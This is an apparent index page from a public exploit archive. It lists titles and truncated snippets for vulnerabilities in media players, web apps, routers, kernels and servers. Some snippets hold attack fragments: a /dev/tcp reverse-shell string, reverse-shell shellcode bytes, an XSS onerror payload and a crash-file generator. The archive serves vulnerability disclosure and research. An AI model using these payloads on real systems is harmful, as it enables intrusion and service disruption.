JaMP Player 4.2.2.0 - Denial of Service
JaMP Player 4.2.2.0 - Denial of Service Exploit Title: JaMP Player v4.2.2.0 .m3u DoS Date: 12 / 8 / 2010 Author: Oh Yaw Theng Software Link: http://www.topdownloads.net/software/jamp-player2219088.html?hl=&ia=0 Version: v4.2.2.0 Tested on: Windows XP SP 2 CVE : N / A !/usr/bin/python filename =...
Microsoft Windows - CreateWindow Function Callback (MS10-048)
Microsoft Windows - CreateWindow Function Callback MS10-048 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com/ Microsoft Windows CreateWindow function callback vulnerability 1. Advisory Information Title: Microsoft Window...
Fat Player 0.6b - .WAV File Processing Buffer Overflow (SEH)
Fat Player 0.6b - .WAV File Processing Buffer Overflow SEH Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute arbitrary code via a long string in a .wav file. NOTE: some of these details are obtained from third party information. Reference:...
Adobe Acrobat Reader 7 9 - U3D Buffer Overflow
Adobe Acrobat Reader 7 9 - U3D Buffer Overflow Copyright c 2009, Felipe Andres Manzano All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source code must retain the...
ParsBlogger - links.asp SQL Injection
ParsBlogger - links.asp SQL Injection ParsBlogger links.asp id Remote SQL Injection Vulnerability Hussin X Author: Hussin X Home : WwW.IQ-ty.CoM email: darkangelg85atYahooDoTcom script :...
PHP-Nuke - iframe.php Remote File Inclusion
PHP-Nuke - iframe.php Remote File Inclusion iFRAME for PhpNuke iframe.php Remote File Include Vulnerabilities script :http://www.desarrollonuke.org http://up.9q9q.net/up/index.php?f=uTRRQnIjG file : iframe.php Dork : "/nuke/iframe.php" Found by & Contact : Cold z3ro , [email protected] ,...
pandaBB - displayCategory Remote File Inclusion
Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion
Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion source: https://www.securityfocus.com/bid/19972/info Ractive Popper is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue could allow an attacker to...
Linux Kernel 2.6.13 2.6.17.4 - sys_prctl() Local Privilege Escalation (1)
Linux Kernel 2.6.13 2.6.17.4 - sysprctl Local Privilege Escalation 1 // / Local r00t Exploit for: / / Linux Kernel PRCTL Core Dump Handling / / BID 18874 / CVE-2006-2451 / / Kernel 2.6.x = 2.6.13 && main PoC code / / - RoMaNSoFt local root code / / 10.Jul.2006 / // include include include include...
LHA 1.x - Remote Buffer Overflow Directory Traversal
LHA 1.x - Remote Buffer Overflow Directory Traversal // source: https://www.securityfocus.com/bid/10243/info LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. The first...
Apache 1.x2.0.x - Chunked-Encoding Memory Corruption (2)
Apache 1.x2.0.x - Chunked-Encoding Memory Corruption 2 // source: https://www.securityfocus.com/bid/5033/info When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper signed interpretatio...
TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)
TL-WR849N 0.9.1 4.16 - Authentication Bypass Upload Firmware Exploit Title: TL-WR849N 0.9.1 4.16 - Authentication Bypass Upload Firmware Date: 2019-11-20 Exploit Author: Elber Tavares Vendor Homepage: https://www.tp-link.com/ Software Link:...
Go SSH servers 0.0.2 - Denial of Service (PoC)
Go SSH servers 0.0.2 - Denial of Service PoC Exploit Title: Go SSH servers 0.0.2 - Denial of Service PoC Author: Mark Adams Date: 2020-02-21 Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py CVE: CVE-2020-9283 Running this script may crash the remote SSH server if it i...
phpList 3.5.0 - Authentication Bypass
phpList 3.5.0 - Authentication Bypass Exploit Title: phpList 3.5.0 - Authentication Bypass Google Dork: N/A Date: 2020-02-03 Exploit Author: Suvadip Kar Author Contact: https://twitter.com/spidersec Vendor Homepage: https://www.phplist.org Software Link: https://www.phplist.org/download-phplist/...
qdPM 9.1 - Remote Code Execution
qdPM 9.1 - Remote Code Execution Exploit Title: qdPM 9.1 - Remote Code Execution Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net Date: 2020-01-22 Exploit Author: Rishal Dwivedi Loginsoft Vendor Homepage: http://qdpm.net/ Software Link: http://qdpm.net/download-qdpm-free-project-managemen...
Django 3.0 2.2 1.11 - Account Hijack
Django 3.0 2.2 1.11 - Account Hijack EDB Note Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip djangocve201919844poc PoC for CVE-2019-19844 Requirements - Python 3.7.x - PostgreSQL 9.5 or higher Setup 1. Create database e.g. djangocve201919844p...
Bolt CMS 3.6.10 - Cross-Site Request Forgery
Bolt CMS 3.6.10 - Cross-Site Request Forgery Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery Date: 2019-10-15 Exploit Author: r3m0t3nu11Zero-Way Vendor Homepage: https://bolt.cm/ Software Link: https://bolt.cm/ Version: up to date and 6.5 Tested on: Linux CVE : CVE-2019-1759 last...
WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)
WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting 2 Exploit Title: WordPress Plugin Photo Gallery by 10Web img src=a onerror='alert2;' 4. Click Save. 5. It will show pop-up confirming existence of XSS vulnerability Timeline 09-01-2019 - Vulnerability Reported 09-03-2019 - Vendor...
Cisco RV130W 1.0.3.44 - Remote Stack Overflow
Cisco RV130W 1.0.3.44 - Remote Stack Overflow !/usr/bin/python Exploit Title: Cisco RV130W Remote Stack Overflow Google Dork: n/a Date: Advisory Published: Feb 2019 Exploit Author: @0x00string Vendor Homepage: cisco.com Software Link:...
i-doit 1.12 - qr.php Cross-Site Scripting
i-doit 1.12 - qr.php Cross-Site Scripting Exploit Title: i-doit 1.12 Cross Site Scripting on qr.php file Date: 28-03-2019 Software Link: https://www.i-doit.org/ Version: 1.12 Exploit Author: BlackFog Team Contact: [email protected] Website: https://securelayer7.net Category: webapps Tested on...
Portier Vision 4.4.4.2 4.4.4.6 - SQL Injection
Portier Vision 4.4.4.2 4.4.4.6 - SQL Injection Advisory ID: SYSS-2018-012 Product: PORTIER Affected Versions: 4.4.4.2, 4.4.4.6 Tested Versions: 4.4.4.2, 4.4.4.6 Vulnerability Type: SQL Injection CWE-89 Risk Level: HIGH Solution Status: Open...
Advantech WebAccess SCADA 8.3.2 - Remote Code Execution
Advantech WebAccess SCADA 8.3.2 - Remote Code Execution Exploit Title: Advantech WebAccess SCADA 8.3.2 - Remote Code Execution Date: 2018-11-02 Exploit Author: Chris Lyne @lynerc Vendor Homepage: http://www.advantech.com Device: NRVMini2 Software Link:...
OpenEMR 5.0.1 - (Authenticated) Remote Code Execution
OpenEMR 5.0.1 - Authenticated Remote Code Execution Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...
PolarisOffice 2017 8 - Remote Code Execution
PolarisOffice 2017 8 - Remote Code Execution Credits: John Page aka hyp3rlinx Website: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/POLARISOFFICE-2017-v8-REMOTE-CODE-EXECUTION.txt ISR: Apparition Security Vendor: www.polarisoffice.com Product:...
Oracle Weblogic Server 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 - Deserialization Remote Command Execution
Oracle Weblogic Server 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 - Deserialization Remote Command Execution -- coding: utf-8 -- Oracle Weblogic Server 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3 Deserialization Remote Command Execution Vulnerability CVE-2018-2628 IMPORTANT: Is provided only for educational ...
OpenCMS 10.5.3 - Cross-Site Scripting
OpenCMS 10.5.3 - Cross-Site Scripting Exploit Title: OpenCMS 10.5.3 Stored Cross Site Scripting Vulnerability Google Dork: N/A Date: 02-04-2018 Exploit Author: Sureshbabu Narvaneni Author Blog : http://nullnews.in Vendor Homepage: http://www.opencms.org/en/ Software Link:...
WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow
WebKitGTK 2.1.2 Ubuntu 14.04 - Heap based Buffer Overflow CVE-2014-1303 PoC for Linux CVE-2014-1303 WebKit Heap based BOF proof of concept for Linux. This repository demonstrates the WebKit heap based buffer overflow vulnerability CVE-2014-1303 on Linux. NOTE: Original exploit is written for Mac ...
WildMIDI 0.4.2 - Multiple Vulnerabilities
WildMIDI 0.4.2 - Multiple Vulnerabilities wildmidi multiple vulnerabilities Author : qflb.wu Introduction: WildMIDI is a simple software midi player which has a core softsynth library that can be used with other applications. The WildMIDI library uses...
Sudo 1.8.20 - get_process_ttyname() Local Privilege Escalation
Sudo 1.8.20 - getprocessttyname Local Privilege Escalation / E-DB Note: http://www.openwall.com/lists/oss-security/2017/05/30/16 E-DB Note: http://seclists.org/oss-sec/2017/q2/470 LinuxsudoCVE-2017-1000367.c Copyright C 2017 Qualys, Inc. This program is free software: you can redistribute it and/...
Emby MediaServer 3.2.5 - Password Reset
Emby MediaServer 3.2.5 - Password Reset Emby MediaServer 3.2.5 Password Reset Vulnerability Vendor: Emby LLC Product web page: https://www.emby.media Affected version: 3.2.5 3.1.5 3.1.2 3.1.1 3.1.0 3.0.0 Summary: Emby formerly Media Browser is a media server designed to organize, play, and stream...
Car Workshop System - SQL Injection
Car Workshop System - SQL Injection Exploit Title: Car Workshop System - SQL Injection Google Dork: N/A Date: 13.03.2017 Vendor Homepage: http://prosoft-apps.com/ Software: https://codecanyon.net/item/car-workshop-system/19562074 Demo: http://workshop.prosoft-apps.com/ Version: N/A Tested on: Win...
NTP 4.2.8p3 - Denial of Service
NTP 4.2.8p3 - Denial of Service !/usr/bin/env python Exploit Title: ntpd 4.2.8p3 remote DoS Date: 2015-10-21 Bug Discovery: John D "Doug" Birdwell Exploit Author: Magnus Klaaborg Stubman @magnusstubman Website: http://support.ntp.org/bin/view/Main/NtpBug2922 Vendor Homepage: http://www.ntp.org/...
Cisco ASA Software 8.x9.x - IKEv1 IKEv2 Buffer Overflow
Cisco ASA Software 8.x9.x - IKEv1 IKEv2 Buffer Overflow !/usr/bin/env python2.7 import socket import sys import struct import string import random import time Spawns a reverse cisco CLI cliShellcode = "\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04"...
Kamailio 4.3.4 - Heap Buffer Overflow
Kamailio 4.3.4 - Heap Buffer Overflow census ID: census-2016-0009 CVE ID: CVE-2016-2385 Affected Products: Kamailio 4.3.4 and possibly previous versions Class: Heap-based Buffer Overflow CWE-122 Remote: Yes Discovered by: Stelios Tsampas Kamailio successor of former OpenSER and SER is an Open...
D-Link DWR-932 Firmware 4.00 - Authentication Bypass
D-Link DWR-932 Firmware 4.00 - Authentication Bypass D-Link DWR-932 Firmware = V4.00 Authentication Bypass - Password Disclosure Author: Saeed reza Zamanian penetrationtest @ Linkedin Product: D-Link DWR-932 Tested Version: Firmware V4.00EUb03 Vendor: D-Link http://www.dlink.com/ Product URL:...
Ganeti - Multiple Vulnerabilities
Ganeti - Multiple Vulnerabilities =begin Advisory Information Title: Ganeti Security Advisory DoS, Unauthenticated Info Leak Advisory URL: https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt Blog URL: https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html Date published:...
Joomla! 3.2.x 3.4.4 - SQL Injection
Joomla! 3.2.x 3.4.4 - SQL Injection --==Mannu joomla SQL Injection exploiter by Team Indishell==-- ...
Inmatrix-Ltd.-Zoom-Player-8.5-.jpeg
Exploit Title: Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit. Version: Zoom Player v8.5 Date: 09-1-2013 Author: Debasish Mandal. Blog : http://www.debasish.in/ d =...
WHM.AutoPilot 2.4.6.5 - Multiple Vulnerabilities
WHM.AutoPilot 2.4.6.5 - Multiple Vulnerabilities WHM.AutoPilot Multiple Vulnerabilities Vendor: Benchmark Designs, LLC Product: WHM.AutoPilot Version: = 2.4.6.5 Website: http://www.whmautopilot.com/ BID: 12119 CVE: CVE-2004-1420 CVE-2004-1421 CVE-2004-1422 OSVDB: 12693 12694 12695 12696 12697...
BMC Track-It! - Multiple Vulnerabilities
BMC Track-It! - Multiple Vulnerabilities Multiple critical vulnerabilities in BMC Track-It! Discovered by Pedro Ribeiro [email protected], Agile Information Security The application exposes several .NET remoting...
Infoblox 6.8.2.11 - OS Command Injection
Infoblox 6.8.2.11 - OS Command Injection Product: Network Automation, licensed as: • NetMRI • Switch Port Manager • Automation Change Manager • Security Device Controller Vendor: Infoblox Vulnerable Versions: 6.4.X.X-6.8.4.X Tested Version: 6.8.2.11 Vendor Notification: May 12th, 2014 Vendor Patc...
Linux Kernel 3.3.5 - driversmediamedia-device.c Local Information Disclosure
Linux Kernel 3.3.5 - driversmediamedia-device.c Local Information Disclosure / source: https://www.securityfocus.com/bid/68048/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to cause a memory leak to obtain sensitive...
Linux Kernel 3.4 3.13.2 (Ubuntu 13.10) - CONFIG_X86_X32 Arbitrary Write (2)
Linux Kernel 3.4 3.13.2 Ubuntu 13.10 - CONFIGX86X32 Arbitrary Write 2 / Local root exploit for CVE-2014-0038. https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c Bug: The X86X32 recvmmsg syscall does not properly sanitize the timeout pointer passed from userspace. Exploit primitive: Pa...
Elite Bulletin Board 2.1.21 - Multiple SQL Injections
Elite Bulletin Board 2.1.21 - Multiple SQL Injections Advisory ID: HTB23133 Product: Elite Bulletin Board Vendor: elite-board.us Vulnerable Versions: 2.1.21 and probably prior Tested Version: 2.1.21 Vendor Notification: November 28, 2012 Vendor Patch: December 6, 2012 Public Disclosure: December...
Slimpdf Reader 1.0 - Memory Corruption
Slimpdf Reader 1.0 - Memory Corruption Exploit Title: Date: June 24 2012 Exploit Author: Carlos Mario Penagos Hollmann Vendor Homepage: www.investintech.com Version:1.0 Tested on: Windows 7 CVE : cve-2011-4220 payload ="A"10000 crash="startxref" pdf=payload+crash filename = "slimpdPoC.pdf" file =...
Linux Kernel 2.6.37-rc2 - ACPI custom_method Local Privilege Escalation
Linux Kernel 2.6.37-rc2 - ACPI custommethod Local Privilege Escalation / american-sign-language.c Linux Kernel http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347 This custommethod file allows to inject custom ACPI methods into the ACPI interpreter...
Camtron CMNC-200 IP Camera - Denial of Service
Camtron CMNC-200 IP Camera - Denial of Service Finding 5: Camera Denial of Service CVE: CVE-2010-4234 The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot. Requests...
Adobe Acrobat and Reader - Array Indexing Remote Code Execution
Adobe Acrobat and Reader - Array Indexing Remote Code Execution nSense Vulnerability Research Security Advisory NSENSE-2010-001 Affected Vendor: Adobe Affected Product: Adobe Reader 9.3.4 for Macintosh Platform: OS X Impact: User...
Linux Kernel 2.6.36-rc6 (RedHat Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure
Linux Kernel 2.6.36-rc6 RedHat Ubuntu 10.04 - pktcdvd Kernel Memory Disclosure / cve-2010-3437.c Linux Kernel http://jon.oberheide.org Information: https://bugzilla.redhat.com/showbug.cgi?id=638085 The PKTCTRLCMDSTATUS device ioctl retrieves a pointer to a pktcdvddevice from the global pktdevs...
Eyeland Studio Inc. - SQL Injection
Eyeland Studio Inc. - SQL Injection Title: Eyeland Studio Inc. SQL Injection Vulnerability Version: 2.0 Author: Mr.P3rfekT Software Site: http://www.eyeland.com/ Tested on Linux CVE : N/A Home : www.realmadridsy.com & www.v4-team.com/cc Founded By Mr.P3rfekT Dork : "Eyeland Studio Inc. All Rights...